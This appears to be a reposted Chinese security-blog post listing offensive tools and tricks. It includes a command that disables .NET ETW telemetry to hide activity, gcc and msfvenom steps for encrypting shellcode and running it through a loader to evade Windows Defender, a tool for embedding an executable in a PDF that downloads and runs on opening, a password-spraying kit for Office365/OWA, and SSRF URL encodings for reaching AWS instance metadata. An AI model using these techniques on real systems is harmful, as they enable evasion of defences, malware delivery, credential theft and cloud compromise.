几个工具

admin
admin
admin
140350
文章
117
评论
2021年11月1日09:02:37评论199 views字数 857阅读2分51秒阅读模式

隐藏.net行为

https://blog.xpnsec.com/hiding-your-dotnet-etw/

https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/

set COMPlus_ETWEnabled=0

bypass AV,沙箱,VM

https://github.com/ReddyyZ/GhostShell

是使用以下脚本编译后加密的
https://github.com/rastating/slae/blob/master/assignment_7/crypter.c

编译

gcc -m32 -fno-stack-protector crypter.c -o 2.exe

msfvenom生成c格式后进行加密

2.exe e "key" "shellcode"

几个工具

编译出来的2.exe本身也可以当作加载器执行shellcode

2.exe x "key" "加密后的shellcode"

本身作为加载器执行免杀效果还可以,只测试了windows defender

几个工具

加密后的shellcode复制main.c中编译,这里我没有编译成功。

EvilPDF

在PDF中嵌入exe

打开pdf时跳出exe下载执行,挺老的方法了,随机使用吧。

https://github.com/thelinuxchoice/evilpdf

几个工具

SprayingToolkit

密码喷射工具

适用于Microsoft Lync,OWA,Office365

https://github.com/byt3bl33d3r/SprayingToolkit

SSRF AWS Bypasses

From:Random_Robbie

http://2852039166/latest/meta-data/

http://[::ffff:a9fe:a9fe]/latest/meta-data/

http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

本文始发于微信公众号(关注安全技术):几个工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月1日09:02:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   几个工具https://cn-sec.com/archives/501427.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息